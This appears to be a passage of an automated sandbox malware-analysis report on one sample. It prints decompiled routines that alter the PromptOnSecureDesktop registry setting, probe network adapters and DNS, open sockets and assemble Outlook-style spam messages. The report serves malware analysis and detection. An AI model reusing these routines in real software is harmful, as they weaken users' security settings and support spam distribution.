                                                                                                                                  0x004085c2
                                                                                                                                  0x004085c5
                                                                                                                                  0x004085c8
                                                                                                                                  0x004085ce
                                                                                                                                  0x00408615
                                                                                                                                  0x0040861a
                                                                                                                                  0x00408620
                                                                                                                                  0x004086a7
                                                                                                                                  0x004086a8
                                                                                                                                  0x004086ad
                                                                                                                                  0x004086ae
                                                                                                                                  0x004086b0
                                                                                                                                  0x00408762
                                                                                                                                  0x00408762
                                                                                                                                  0x00408768
                                                                                                                                  0x00408768
                                                                                                                                  0x0040876b
                                                                                                                                  0x00408770
                                                                                                                                  0x00408775
                                                                                                                                  0x00408778
                                                                                                                                  0x00408778
                                                                                                                                  0x00000000
                                                                                                                                  0x00408778
                                                                                                                                  0x004086b6
                                                                                                                                  0x004086bb
                                                                                                                                  0x004086bd
                                                                                                                                  0x0040875b
                                                                                                                                  0x0040875c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040875c
                                                                                                                                  0x004086c5
                                                                                                                                  0x004086cc
                                                                                                                                  0x004086d8
                                                                                                                                  0x004086db
                                                                                                                                  0x004086eb
                                                                                                                                  0x004086f2
                                                                                                                                  0x004086ff
                                                                                                                                  0x00408705
                                                                                                                                  0x0040870d
                                                                                                                                  0x00408714
                                                                                                                                  0x00408733
                                                                                                                                  0x00408739
                                                                                                                                  0x0040873b
                                                                                                                                  0x0040874f
                                                                                                                                  0x00408755
                                                                                                                                  0x00000000
                                                                                                                                  0x0040875a
                                                                                                                                  0x00408746
                                                                                                                                  0x0040874b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040874b
                                                                                                                                  0x0040862c
                                                                                                                                  0x00408633
                                                                                                                                  0x00408638
                                                                                                                                  0x00408639
                                                                                                                                  0x00408644
                                                                                                                                  0x00408647
                                                                                                                                  0x0040864a
                                                                                                                                  0x0040864c
                                                                                                                                  0x00408671
                                                                                                                                  0x00408683
                                                                                                                                  0x0040868c
                                                                                                                                  0x00408693
                                                                                                                                  0x0040869f
                                                                                                                                  0x004086a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040864e
                                                                                                                                  0x0040864e
                                                                                                                                  0x0040864e
                                                                                                                                  0x00408657
                                                                                                                                  0x0040865d
                                                                                                                                  0x00408660
                                                                                                                                  0x00408663
                                                                                                                                  0x00408666
                                                                                                                                  0x0040866c
                                                                                                                                  0x0040866c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040864e
                                                                                                                                  0x004085da
                                                                                                                                  0x004085df
                                                                                                                                  0x004085e2
                                                                                                                                  0x004085e5
                                                                                                                                  0x004085eb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004085ed
                                                                                                                                  0x004085ef
                                                                                                                                  0x00000000
Instruction addresses (one per decompiled C-Code line, in order): 0x00000000 0x004085f4 0x004085fa 0x00000000 0x00000000 0x00408601 0x00408606 0x00408609 0x0040860f 0x00000000 0x00000000 0x00000000 0x0040860f 0x004083c2 0x004083df 0x004083e2 0x004083e5 0x004083ea 0x004083f3 0x004083f9 0x004083fb 0x00000000 0x00000000 0x00408414 0x0040841a 0x0040841c 0x0040842d 0x0040843e 0x00408441 0x00408447 0x0040844a 0x00000000 0x0040844a 0x0040841e 0x00408421 0x00000000 0x00000000 0x00408423 0x00408426 0x00000000 0x00000000 0x00408428 0x0040842b 0x00000000 0x00000000 0x00000000 0x0040842b 0x0040838d

APIs
• RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
• RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
• RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
• RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Value$CloseOpenQuery
• String ID: PromptOnSecureDesktop$localcfg
• API String ID: 237177642-1678164370
• Opcode ID: e16cdcce0ac22d73867edb43c1fef29eb70daba9e4796f121648f2b303b8506c
• Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
• Opcode Fuzzy Hash: e16cdcce0ac22d73867edb43c1fef29eb70daba9e4796f121648f2b303b8506c
• Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
Similarity
• API ID: ___check_float_string$__inc$_isdigit$__filbuf
• String ID: +
• API String ID: 2300710676-2126386893
• Opcode ID: ad1f5bb9c355918d75b7c057bde0c440c9cfce169a1ae502d87da89f97f783a0
• Instruction ID: 3027c3f7f7f7b209974f4d897e9ad327b7b2965923b83da4b714fa7d9bf2a412
• Opcode Fuzzy Hash: ad1f5bb9c355918d75b7c057bde0c440c9cfce169a1ae502d87da89f97f783a0
• Instruction Fuzzy Hash: 44F172B5D00659DBCF14DFA9CC90AEEBB75BF84304F14829AD81A67302D739AA80CF55
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 54%
E0040199C(void* __eax) {
    long _v8;
    _Unknown_base(*)()* _v12;
    struct HINSTANCE__* _v16;
    char _v20;
    void* _v24;
    long _v28;
    _Unknown_base(*)()* _t30;
    intOrPtr _t32;
    void* _t34;
    void* _t41;
    struct HINSTANCE__* _t48;
    _Unknown_base(*)()* _t49;
    void* _t50;

    _v20 = 0;
    _v28 = 0;
    __imp__#11("123.45.67.89");
    _v24 = __eax;
    _t48 = LoadLibraryA("Iphlpapi.dll");
    _v16 = _t48;
    if(_t48 != 0) {
        _v12 = GetProcAddress(_t48, "GetAdaptersInfo");
        _t49 = GetProcAddress(_t48, "GetIfEntry");
        _t30 = GetProcAddress(_v16, "GetBestInterface");
        if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
            FreeLibrary(_v16);
            goto L21;
        } else {
             *_t30(_v24,  &_v20);
            _t34 = GetProcessHeap();
            _v24 = _t34;
            if(_t34 == 0) {
                L21:
                _t32 = 0;
                L22:
                return _t32;
            }
            _t50 = HeapAlloc(_t34, 0, 0x288);
            if(_t50 == 0) {
                goto L21;
            }
            _push( &_v8);
            _push(_t50);
            _v8 = 0x288;
            if(_v12() == 0x6f) {
                _t50 = HeapReAlloc(_v24, 0, _t50, _v8);
            }
            if(_t50 == 0) {
                L18:
                FreeLibrary(_v16);
                if(_v28 == 0) {
                    goto L21;
                }
                _t32 = 1;
                goto L22;
            } else {
                _push( &_v8);
                _push(_t50);
                if(_v12() != 0) {
                    goto L18;
                }
                _t41 = _t50;
                while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
                    _t41 =  *_t41;
                    if(_t41 != 0) {
                        continue;
                    }
                    L17:
                    HeapFree(_v24, 0, _t50);
                    goto L18;
                }
                if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
                    _v28 = 1;
                }
                goto L17;
            }
        }
    }
    return 0;
}

Instruction addresses (one per decompiled C-Code line, in order): 0x004019ab 0x004019ae 0x004019b1 0x004019bc 0x004019c5 0x004019c7 0x004019cc 0x004019ea 0x004019f7 0x004019f9 0x004019fe 0x00401ab6 0x00000000 0x00401a14 0x00401a1b 0x00401a1d 0x00401a23 0x00401a28 0x00401abc 0x00401abc 0x00401abe 0x00000000 0x00401abe 0x00401a3c 0x00401a40 0x00000000 0x00000000 0x00401a45 0x00401a46 0x00401a47 0x00401a50 0x00401a60 0x00401a60 0x00401a67 0x00401aa1 0x00401aa4 0x00401aad 0x00000000 0x00000000 0x00401aaf 0x00000000 0x00401a69 0x00401a6c 0x00401a6d 0x00401a73 0x00000000 0x00000000 0x00401a75 0x00401a77 0x00401a82 0x00401a86 0x00000000 0x00000000 0x00401a96 0x00401a9b 0x00000000 0x00401a9b 0x00401a91 0x00401a93 0x00401a93 0x00000000 0x00401a91 0x00401a67 0x004019fe 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                                                                  • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                                                                  • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                                                                  • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                                                                  • API String ID: 835516345-270533642
                                                                                                                                  • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                                                                  • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                                                                  • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                                                                  • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 00AD865A
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 00AD867B
                                                                                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 00AD86A8
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00AD86B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseOpenQuery
                                                                                                                                  • String ID: "$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 237177642-3108538426
                                                                                                                                  • Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                                                                  • Instruction ID: 91b97e6e4d0c3d0e0bb4e78f86b339f65db68fdf311229bf1cb0a86abb29b4e0
                                                                                                                                  • Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                                                                  • Instruction Fuzzy Hash: 16C1A271900108BEEB11EBA4DD85EEF7BBCEB18340F144077F606E6251EB748E949B65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                                                                                                                  • String ID: -$9
                                                                                                                                  • API String ID: 3451365851-1631151375
                                                                                                                                  • Opcode ID: 54b7069774bb0cb7d3955371641dd9def0482dd4aec8b2fe72b736631d92e6e8
                                                                                                                                  • Instruction ID: 47dd038e71b6e8d87cef41845c8892bd9c182dcfcc000af15c34b3d9f0a9e589
                                                                                                                                  • Opcode Fuzzy Hash: 54b7069774bb0cb7d3955371641dd9def0482dd4aec8b2fe72b736631d92e6e8
                                                                                                                                  • Instruction Fuzzy Hash: D3F14DB1E052299FDB24CF58DC89BEEB7B1BB44304F5481DAE019A7281D7789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3455034128-2366072709
                                                                                                                                  • Opcode ID: f34dfe748a1283b40b8cec42bfb9d1d5154c90a26b5fac5b30e95f034362d87d
                                                                                                                                  • Instruction ID: 06cf0195d11e21c04b465d4908b5bf6feeea47427d092b283015566512795ab7
                                                                                                                                  • Opcode Fuzzy Hash: f34dfe748a1283b40b8cec42bfb9d1d5154c90a26b5fac5b30e95f034362d87d
                                                                                                                                  • Instruction Fuzzy Hash: 5DF16BF1E002299FDB24CF46DC81BAEB7B5BB85304F54449AE209A7241D738AE84CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00AD1601
                                                                                                                                  • lstrlenW.KERNEL32(-00000003), ref: 00AD17D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShelllstrlen
                                                                                                                                  • String ID: $<$@$D
                                                                                                                                  • API String ID: 1628651668-1974347203
                                                                                                                                  • Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                                                                  • Instruction ID: f4bb3e7d9452a23ee40dbb63290068a379ee1af0943ff49b39cb3b97b741351b
                                                                                                                                  • Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                                                                  • Instruction Fuzzy Hash: ABF18CB5608341AFD720CF64C898BABB7F5FB88304F10892EF596973A0D7B49944CB56
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 00AD76D9
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 00AD7757
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 00AD778F
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 00AD78B4
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD794E
                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00AD796D
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD797E
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD79AC
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD7A56
                                                                                                                                    • Part of subcall function 00ADF40C: lstrlen.KERNEL32(000000E4,00000000,PromptOnSecureDesktop,000000E4,00AD772A,?), ref: 00ADF414
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00AD79F6
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00AD7A4D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: "$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3433985886-3108538426
                                                                                                                                  • Opcode ID: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                                                                  • Instruction ID: 9419d04d5f39f1f0e2767a23e283965e6075d2c5f6c206c05449313adcf8c525
                                                                                                                                  • Opcode Fuzzy Hash: 6662dee372d798d6f1e3baf347185b0c176791543b489e25c2cc06528122fd8e
                                                                                                                                  • Instruction Fuzzy Hash: 25C1AF72904209AFDB25DBA4DD45FEE7BB9AF49310F1000A7F506E6291FB719E84CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00AD2CED
                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 00AD2D07
                                                                                                                                  • htons.WS2_32(00000000), ref: 00AD2D42
                                                                                                                                  • select.WS2_32 ref: 00AD2D8F
                                                                                                                                  • recv.WS2_32(?,00000000,00001000,00000000), ref: 00AD2DB1
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00AD2E62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateProcesshtonsrecvselectsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 127016686-0
                                                                                                                                  • Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                                                                  • Instruction ID: af1f69dde030ba7b9d844e8f9071c5fdebb94d110a6a763bae4d58c14e7e905f
                                                                                                                                  • Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                                                                  • Instruction Fuzzy Hash: F161E371504305ABC320AF64DC08B6BBBF8FB68741F14481AF98697251DBB5DC80DBA5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E0040AD89(void* __ecx, void* __eflags) {
                                                                                                                                  				signed int _t48;
                                                                                                                                  				signed int _t50;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t55;
                                                                                                                                  				void* _t76;
                                                                                                                                  				signed int _t77;
                                                                                                                                  				void* _t81;
                                                                                                                                  				CHAR* _t92;
                                                                                                                                  				void* _t94;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t98;
                                                                                                                                  
                                                                                                                                  				_t76 = __ecx;
                                                                                                                                  				_t94 = _t96 - 0x74;
                                                                                                                                  				GetLocalTime(_t94 + 0x50);
                                                                                                                                  				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
                                                                                                                                  				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
                                                                                                                                  				E0040AD08(_t94 - 0x110);
                                                                                                                                  				_t98 = _t96 - 0x184 + 0x10;
                                                                                                                                  				if(E004030B5() == 0) {
                                                                                                                                  					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
                                                                                                                                  				} else {
                                                                                                                                  					_push(_t94 - 0x90);
                                                                                                                                  					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
                                                                                                                                  				}
                                                                                                                                  				_t48 = E0040ECA5();
                                                                                                                                  				_t77 = 0xe;
                                                                                                                                  				_t50 = E0040ECA5();
                                                                                                                                  				_t92 = "%OUTLOOK_BND_";
                                                                                                                                  				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
                                                                                                                                  				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t103 = _t53;
                                                                                                                                  					if(_t53 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t55 = E0040EDAC(_t53 + 0xd);
                                                                                                                                  					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
                                                                                                                                  					__eflags = _t81;
                                                                                                                                  					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
                                                                                                                                  					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
                                                                                                                                  					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
                                                                                                                                  					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
                                                                                                                                  					_t98 = _t98 + 0x40;
                                                                                                                                  					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                                                                  				}
                                                                                                                                  				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
                                                                                                                                  				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
                                                                                                                                  				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                                                                    • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                                                                    • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                                                                    • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                                                                    • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                                                                    • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                                                                    • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                                                                  • wsprintfA.USER32 ref: 0040AEA5
                                                                                                                                    • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                                                                  • wsprintfA.USER32 ref: 0040AE4F
                                                                                                                                  • wsprintfA.USER32 ref: 0040AE5E
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                                                                  • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                                                                  • API String ID: 3631595830-1816598006
                                                                                                                                  • Opcode ID: 6529b2604f33923130454e2189857e6116d07f16e51892a90e4688e0fcd74ec4
                                                                                                                                  • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                                                                  • Opcode Fuzzy Hash: 6529b2604f33923130454e2189857e6116d07f16e51892a90e4688e0fcd74ec4
                                                                                                                                  • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                  			E00402DF2(intOrPtr _a4) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				long _v16;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				short _v30;
                                                                                                                                  				char _v32;
                                                                                                                                  				struct HINSTANCE__* _t18;
                                                                                                                                  				void* _t22;
                                                                                                                                  				signed int _t23;
                                                                                                                                  				short _t27;
                                                                                                                                  				signed int _t31;
                                                                                                                                  				intOrPtr* _t35;
                                                                                                                                  				intOrPtr* _t37;
                                                                                                                                  				CHAR* _t38;
                                                                                                                                  				void* _t40;
                                                                                                                                  
                                                                                                                                  				_t38 = "iphlpapi.dll";
                                                                                                                                  				_t18 = GetModuleHandleA(_t38);
                                                                                                                                  				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                                                                  					_t18 = LoadLibraryA(_t38);
                                                                                                                                  				}
                                                                                                                                  				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                                                                  					L18:
                                                                                                                                  					return 0;
                                                                                                                                  				} else {
                                                                                                                                  					_t35 = GetProcAddress(_t18, "GetNetworkParams");
                                                                                                                                  					if(_t35 == 0) {
                                                                                                                                  						goto L18;
                                                                                                                                  					}
                                                                                                                                  					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
                                                                                                                                  					_t33 =  &_v16;
                                                                                                                                  					_v8 = _t22;
                                                                                                                                  					_v16 = 0x4000;
                                                                                                                                  					_t23 =  *_t35(_t22,  &_v16);
                                                                                                                                  					if(_t23 != 0) {
                                                                                                                                  						goto L18;
                                                                                                                                  					}
                                                                                                                                  					_v12 = _v12 & _t23;
                                                                                                                                  					_t37 = _v8 + 0x10c;
                                                                                                                                  					if(_t37 == 0) {
                                                                                                                                  						L17:
                                                                                                                                  						HeapFree(GetProcessHeap(), 0, _v8);
                                                                                                                                  						return _v12;
                                                                                                                                  					} else {
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  					do {
                                                                                                                                  						L8:
                                                                                                                                  						_t40 = _t37 + 4;
                                                                                                                                  						if(_t40 == 0) {
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						_t27 = 2;
                                                                                                                                  						_v32 = _t27;
                                                                                                                                  						__imp__#9(0x35);
                                                                                                                                  						_v30 = _t27;
                                                                                                                                  						__imp__#11(_t40);
                                                                                                                                  						_v28 = _t27;
                                                                                                                                  						if(_t27 == 0 || _t27 == 0xffffffff) {
                                                                                                                                  							__imp__#52(_t40);
                                                                                                                                  							if(_t27 == 0) {
                                                                                                                                  								goto L16;
                                                                                                                                  							}
                                                                                                                                  							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
